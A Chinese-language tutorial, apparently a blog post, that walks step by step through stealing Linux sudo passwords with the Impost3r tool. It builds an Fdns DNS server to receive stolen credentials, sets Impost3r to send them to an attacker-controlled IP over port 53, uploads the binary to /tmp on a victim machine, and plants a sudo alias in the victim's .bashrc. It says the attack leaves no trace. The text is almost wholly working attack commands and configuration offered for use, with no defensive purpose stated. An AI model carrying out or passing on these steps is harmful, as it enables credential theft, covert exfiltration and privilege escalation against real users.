sudo密码窃取
工具链接:https://github.com/ph4ntonn/Impost3r
mpost3r是一个利用C语言编写,用来窃取linux下sudo密码的工具。
用户可使用此程序在普通用户权限下,制造水坑,窃取合法用户的sudo密码。
DNS协议通信
使用fdns搭建dns服务端
git clone https://github.com/deepdarkness/Fdns
编译
cd Fdns/src
gcc -o dns main.c util.c
运行
./dns
安装impostr
git clone https://github.com/ph4ntonn/Impost3r
修改代码中的ip地址
/*
Custom setting
*/
# define FILENAME "/tmp/.impost3r" \\设置Impost3r在目标服务器上的位置
# define BACKUP_BASHRC "/tmp/.bashrc" \\设置攻击者备份的源.bashrc在目标服务器上的位置
# define SAVE_OR_SEND 0 \\设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送)
/*
Send to server
*/
# define MAX_RESEND 30 \\设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数
# define RESEND_INTERVAL 5 \\设置每一次发送密码的间隔
# define REMOTE_ADDRESS "192.168.0.12" \\设置回送密码的远程地址
# define REMOTE_PORT 53 \\设置回送密码的远程端口
/*
Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" \\设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下
执行make命令编译
我们将生成的.impost3r
上传到受害机器的/tmp
目录下。
拷贝一份.bashrc
文件:
cp ~/.bashrc /tmp/
修改原有的.bashrc
文件:
将以下代码加入文件的最后:
alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'
当目标机器上执行 sudo 命令,并输入正确的密码之后,我们会在自己的 VPS 上看到传输过来的正确密码。这些操作完成之后,在目标机器上不会留下任何痕迹。